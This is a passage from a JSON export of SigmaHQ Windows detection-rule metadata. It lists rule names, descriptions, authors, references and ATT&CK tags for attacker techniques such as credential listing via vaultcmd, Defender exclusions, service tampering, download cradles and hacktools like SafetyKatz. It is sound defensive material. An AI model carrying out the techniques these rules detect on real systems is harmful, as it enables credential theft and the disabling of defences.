"filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "value": "NtdllPipe Like Activity Execution" }, { "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the extensions of the file is suspicious", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_encode_susp_extensions.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea0cdc3e-2239-4f26-a947-4e8f8224e464", "value": "Suspicious File Encoded To Base64 Via Certutil.EXE" }, { "description": "Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming" ], "filename": "proc_creation_win_sysinternals_procdump_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1480785527901204481", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", "value": "Potential SysInternals ProcDump Evasion" }, { "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_taskmgr_localsystem.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", "value": "Taskmgr as LOCAL_SYSTEM" }, { "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", "meta": { "author": "frack113", "creation_date": "2022-04-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vaultcmd_list_creds.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml" ], "tags": [ "attack.credential-access", "attack.t1555.004" ] }, "related": [ { "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "value": "Windows Credential Manager Access via VaultCmd" }, { "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", "meta": { "author": "frack113", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate administration activity", "Software installations and removal" ], "filename": "proc_creation_win_netsh_fw_delete_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "value": "Firewall Rule Deleted Via Netsh.EXE" }, { "description": "Extract data from cab file and hide it in an alternate data stream", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_extrac32_ads.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", "value": "Suspicious Extrac32 Alternate Data Stream Execution" }, { "description": "Commandline to launch powershell with a base64 payload", "meta": { "author": "frack113", "creation_date": "2022-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_encode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", "value": "Suspicious Execution of Powershell with Base64" }, { "description": "Detects usage of the \"ms-appinstaller\" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE\nThe downloaded files are temporarly stored in \":\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_ms_appinstaller_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "180c7c5c-d64b-4a63-86e9-68910451bc8b", "value": "Potential File Download Via MS-AppInstaller Protocol Handler" }, { "description": "Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_electron_app_children.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://github.com/mttaggart/quasar", "https://positive.security/blog/ms-officecmd-rce", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", "https://taggart-tech.com/quasar-electron/", "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" ], "tags": [ "attack.execution" ] }, "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "value": "Suspicious Electron Application Child Processes" }, { "description": "Detects a suspicious script executions from temporary folder", "meta": { "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "creation_date": "2021-07-14", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_susp_script_exec_from_temp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "value": "Suspicious Script Execution From Temp Folder" }, { "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-07", "falsepositive": [ "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://twitter.com/frack113/status/1555830623633375232", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", "value": "Use Short Name Path in Command Line" }, { "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_safetykatz.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SafetyKatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", "value": "HackTool - SafetyKatz Execution" }, { "description": "Detects a suspicious process that is masquerading as the legitimate \"svchost.exe\" by naming its binary \"svchost.exe\" and executing from an uncommon location.\nAdversaries often disguise their malicious binaries by naming them after legitimate system processes like \"svchost.exe\" to evade detection.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-08-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_svchost_masqueraded_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://tria.ge/240731-jh4crsycnb/behavioral2", "https://redcanary.com/blog/threat-detection/process-masquerading/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "be58d2e2-06c8-4f58-b666-b99f6dc3b6cd", "value": "Suspicious Process Masquerading As SvcHost.EXE" }, { "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ksetup_password_change_computer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://twitter.com/Oddvarmoe/status/1641712700605513729", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" ], "tags": [ "attack.execution" ] }, "uuid": "de16d92c-c446-4d53-8938-10aeef41c8b6", "value": "Computer Password Change Via Ksetup.EXE" }, { "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior", "creation_date": "2022-09-01", "falsepositive": [ "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "filename": "proc_creation_win_susp_service_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "value": "Suspicious Windows Service Tampering" }, { "description": "Detects the execution of the BCP utility in order to export data from the database.\nAttackers were seen saving their malware to a database column or table and then later extracting it via \"bcp.exe\" into a file.\n", "meta": { "author": "Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-08-20", "falsepositive": [ "Legitimate data export operations." ], "filename": "proc_creation_win_bcp_export_data.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/", "https://www.huntress.com/blog/attacking-mssql-servers-pt-ii", "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://docs.microsoft.com/en-us/sql/tools/bcp-utility", "https://www.huntress.com/blog/attacking-mssql-servers", "https://asec.ahnlab.com/en/61000/", "https://asec.ahnlab.com/en/78944/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml" ], "tags": [ "attack.execution", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c615d676-f655-46b9-b913-78729021e5d7", "value": "Data Export From MSSQL Table Via BCP.EXE" }, { "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) child process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wermgr_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055", "attack.t1036" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "value": "Suspicious Child Process Of Wermgr.EXE" }, { "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-29", "falsepositive": [ "Possible Admin Activity", "Other Cmdlets that may use the same parameters" ], "filename": "proc_creation_win_powershell_defender_exclusion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17769c90-230e-488b-a463-e05c08e9d48f", "value": "Powershell Defender Exclusion" }, { "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-31", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_adcspwn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/bats3c/ADCSPwn", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml" ], "tags": [ "attack.credential-access", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "value": "HackTool - ADCSPwn Execution" }, { "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-22", "falsepositive": [ "Legitimate use of the PDQDeploy tool to execute these commands" ], "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1550483085472432128", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml" ], "tags": [ "attack.execution" ] }, "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "value": "Potentially Suspicious Execution Of PDQDeployRunner" }, { "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend", "https://twitter.com/0gtweet/status/1638069413717975046", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml" ], "tags": [ "attack.discovery", "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48bbc537-b652-4b4e-bd1d-281172df448f", "value": "Sysinternals PsSuspend Execution" }, { "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", "meta": { "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-21", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_sc_service_path_modification.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", "value": "Suspicious Service Path Modification" }, { "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", "meta": { "author": "elhoim", "creation_date": "2022-09-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_vmnat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1525901219247845376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205", "value": "Renamed Vmnat.exe Execution" }, { "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_get_clipboard.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" ], "tags": [ "attack.collection", "attack.t1115" ] }, "related": [ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "value": "PowerShell Get-Clipboard Cmdlet Via CLI" }, { "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Legitimate use of the library" ], "filename": "proc_creation_win_powershell_download_com_cradles.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "value": "Potential COM Objects Download Cradles Usage - Process Creation" }, { "description": "Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation\n", "meta": { "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Particular web applications may spawn a shell process legitimately" ], "filename": "proc_creation_win_webshell_susp_process_spawned_from_webserver.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1190" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", "value": "Suspicious Process By Web Server Process" }, { "description": "Detects scheduled task creations or modification on a suspicious schedule type", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate processes that run at logon. Filter according to your environment" ], "filename": "proc_creation_win_schtasks_schedule_type.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", "value": "Suspicious Schtasks Schedule Types" }, { "description": "Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_schtasks_delete_all.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", "value": "Delete All Scheduled Tasks" }, { "description": "Detects the execution of \"BitLockerToGo.EXE\".\nBitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.\nThis is a rarely used application and usage of it at all is worth investigating.\nMalware such as Lumma stealer has been seen using this process as a target for process hollowing.\n", "meta": { "author": "Josh Nickels, mttaggart", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate usage of BitLockerToGo.exe to encrypt portable devices." ], "filename": "proc_creation_win_bitlockertogo_execution.yml", "level": "low", "logsource.category": "process_creation", 